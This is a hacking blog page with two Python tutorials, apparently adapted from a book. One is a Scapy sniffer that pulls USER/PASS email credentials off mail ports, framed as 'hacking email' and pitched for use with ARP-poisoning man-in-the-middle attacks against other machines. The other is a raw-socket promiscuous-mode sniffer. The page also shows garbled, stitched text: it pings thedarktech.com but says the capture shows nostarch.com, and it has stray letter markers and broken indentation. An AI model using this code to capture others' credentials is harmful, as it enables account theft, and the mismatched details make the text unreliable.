The Dark Tech

The Dark Tech

Packet Sniffer

How To Hack Email By Packet Sniffing With Python

by 1 Comment

Let’s learn About Scapy

Scapy is a packet manipulation tool for computer networks, originally written in Python by Philippe Biondi. It can forge or decode packets, send them on the wire, capture them, and match requests and replies. It can also handle tasks like scanning, tracerouting, probing, unit tests, attacks, and network discovery.

Scapy Interface

Stealing Email Credentials

You have already spent some time getting into the nuts and bolts of sniff- ing in Python. So let’s get to know Scapy’s interface for sniffing packets and dissecting their contents. We are going to build a very simple sniffer to cap- ture SMTP, POP3, and IMAP credentials. Later, by coupling our sniffer with our Address Resolution Protocol (ARP) poisoning man-in-the-middle (MITM) attack, we can easily steal credentials from other machines on the network. This technique can of course be applied to any protocol or to sim- ply suck in all traffic and store it in a PCAP file for analysis, which we will also demonstrate.

To get a feel for Scapy, let’s start by building a skeleton sniffer that sim- ply dissects and dumps the packets out. The aptly named sniff function looks like the following:

sniff(filter="",iface="any",prn=function,count=N)

The filter parameter allows us to specify a BPF (Wireshark-style) filter to the packets that Scapy sniffs, which can be left blank to sniff all packets. For example, to sniff all HTTP packets you would use a BPF filter of tcp port 80. The iface parameter tells the sniffer which network interface to sniff on; if left blank, Scapy will sniff on all interfaces. The prn parameter specifies a callback function to be called for every packet that matches the filter, and the callback function receives the packet object as its single parameter. The count parameter specifies how many packets you want to sniff; if left blank, Scapy will sniff indefinitely.

Let’s start by creating a simple sniffer that sniffs a packet and dumps its contents. We’ll then expand it to only sniff email-related commands. Crack open mail_sniffer.py and jam out the following code:

from scapy.all import *
# our packet callback
 def packet_callback(packet): 
 print packet.show()

We start by defining our callback function that will receive each sniffed packet.

# fire up our sniffer
 sniff(prn=packet_callback,count=1)

Now we will simply tell Scapy to start sniffing on all interfaces with no filtering.

Now let’s run the script and you should see output similar to what you see below.

$ python2.7 mail_sniffer.py
WARNING: No route found for IPv6 destination :: (no default route?)
###[ Ethernet ]###
 dst = 10:40:f3:ab:71:02 
 src = 00:18:e7:ff:5c:f8
 type = 0x800
###[ IP ]###
 version = 4L 
 ihl = 5L
 tos = 0x0
 len = 52
 id = 35232
 flags = DF
 frag = 0L
 ttl = 51
 proto = tcp
 chksum = 0x4a51
 src = 195.91.239.8 
 dst = 192.168.0.198
 \options \
###[ TCP ]###
 sport = etlservicemgr 
 dport = 54000
 seq = 4154787032
 ack = 2619128538
 dataofs = 8L
 reserved = 0L
 flags = A 
 window = 330
 chksum = 0x80a2
 urgptr = 0
 options = [('NOP', None), ('NOP', None), ('Timestamp', (1960913461,¬ 
 764897985))]
 None

How incredibly easy was that! We can see that when the first packet was received on the network, our callback function used the built-in function packet.show() to display the packet contents and to dissect some of the proto- col information. Using show() is a great way to debug scripts as you are going along to make sure you are capturing the output you want.

Now that we have our basic sniffer running, let’s apply a filter and add some logic to our callback function to peel out email-related authentication strings.

from scapy.all import *
# our packet callback
def packet_callback(packet):
 
 if packet[TCP].payload: 
 
 mail_packet = str(packet[TCP].payload)
 if "user" in mail_packet.lower() or "pass" in mail_packet.lower():

When our callback function is called, we check to make sure it has a data payload and whether the payload contains the typical USER or PASS mail commands.

 print "[*] Server: %s" % packet[IP].dst
 print "[*] %s" % packet[TCP].payload

If we detect an authentication string, we print out the server we are sending it to and the actual data bytes of the packet.

# fire up our sniffer
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)

Pretty straightforward stuff here. We changed our sniff function to add a filter that only includes traffic destined for the common mail ports 110 (POP3), 143 (IMAP), and SMTP (25). We also used a new parameter called store, which when set to 0 ensures that Scapy isn’t keep- ing the packets in memory. It’s a good idea to use this parameter if you intend to leave a long-term sniffer running because then you won’t be consuming vast amounts of RAM.

Lets Test Our Code

Here is some example output from a dummy email account I attempted to connect my mail client to:

[*] Server: 25.57.168.12
[*] USER thedarktech
[*] Server: 25.57.168.12
[*] PASS sudopsxc
[*] Server: 25.57.168.12
[*] USER thedarktech
[*] Server: 25.57.168.12
[*] PASS test

You can see that my mail client is attempting to log in to the server at 25.57.168.12 and sending the plain text credentials over the wire. This is a really simple example of how you can take a Scapy sniffing script and turn it into a useful tool during penetration tests.

Sniffing your own traffic might be fun, but it’s always better to sniff with a friend, so in next article we will take a look at how you can perform an ARP poisoning attack to sniff the traffic of a target machine on the same network.

Also Check Decoding The ICMP Packets With Python | For Hackers.

Packet Sniffer On Windows And Linux Using Python

by 2 Comments

What Is Packet Sniffing

Packet Analyzer (also known as a packet sniffer) is a computer program or piece of computer hardware (such as a packet capture appliance) that can intercept and log traffic that passes over a digital network or part of a network.Packet capture is the process of intercepting and logging traffic. 

Packet Sniffing On Windows And Linux

Accessing raw sockets in Windows is slightly different than on its Linux brethren, but we want to have the flexibility to deploy the same sniffer to multiple platforms. We will create our socket object and then determine which platform we are running on. Windows requires us to set some additional flags through a socket input/output control (IOCTL),1 which enables promiscuous mode on the network interface. In our first example, we simply set up our raw socket sniffer, read in a single packet, and then quit.

import socket
import os
# host to listen on
host = "192.168.0.196"
# create a raw socket and bind it to the public interface
if os.name == "nt":
 socket_protocol = socket.IPPROTO_IP 
else:
 socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) 
sniffer.bind((host, 0))

We start by constructing our socket object with the parameters necessary for sniffing packets on our network interface u. The difference between Windows and Linux is that Windows will allow us to sniff all incoming packets regardless of protocol, whereas Linux forces us to specify that we are sniffing ICMP. Note that we are using promiscuous mode, which requires administrative privileges on Windows or root on Linux. Promiscuous mode allows us to sniff all packets that the network card sees, even those not destined for your specific host.

# we want the IP headers included in the capture
 sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

Next we set a socket option that includes the IP headers in our captured packets.

# if we're using Windows, we need to send an IOCTL
# to set up promiscuous mode
w if os.name == "nt": 
 sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

The next step w is to determine if we are using Windows, and if so, we perform the additional step of sending an IOCTL to the network card driver to enable promiscu- ous mode. If you’re running Windows in a virtual machine, you will likely get a notification that the guest operating system is enabling promiscuous mode; you, of course, will allow it. 

# read in a single packet
 print sniffer.recvfrom(65565)

Now we are ready to actually perform some sniffing, and in this case we are simply printing out the entire raw packet with no packet decoding. This is just to test to make sure we have the core of our sniffing code working.

# if we're using Windows, turn off promiscuous mode
 if os.name == "nt": 
 sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

After a single packet is sniffed, we again test for Windows, and disable promiscuous mode before exiting the script.

Now Let’s Test Our Packet Sniffer

Open up a fresh terminal or cmd.exe shell under Windows and run the following:

python sniffer.py

In another terminal or shell window, you can simply pick a host to ping. Here, we’ll ping thedarktech.com:

ping thedarktech.com

In your first window where you executed your sniffer, you should see some garbled output that closely resembles the following:

('E\x00\x00:\x0f\x98\x00\x00\x80\x11\xa9\x0e\xc0\xa8\x00\xbb\xc0\xa8\x0
0\x01\x04\x01\x005\x00&\xd6d\n\xde\x01\x00\x00\x01\x00\x00\x00\x00\x00\
x00\x08thedarktech\x03com\x00\x00\x01\x00\x01', ('192.168.0.187', 0))

You can see that we have captured the initial ICMP ping request des- tined for nostarch.com (based on the appearance of the string nostarch.com). If you are running this example on Linux, then you would receive the response from nostarch.com. Sniffing one packet is not overly useful, so let’s add some functionality to process more packets and decode their contents in next article.

Also Check SSH Tunneling Using Python |For Hackers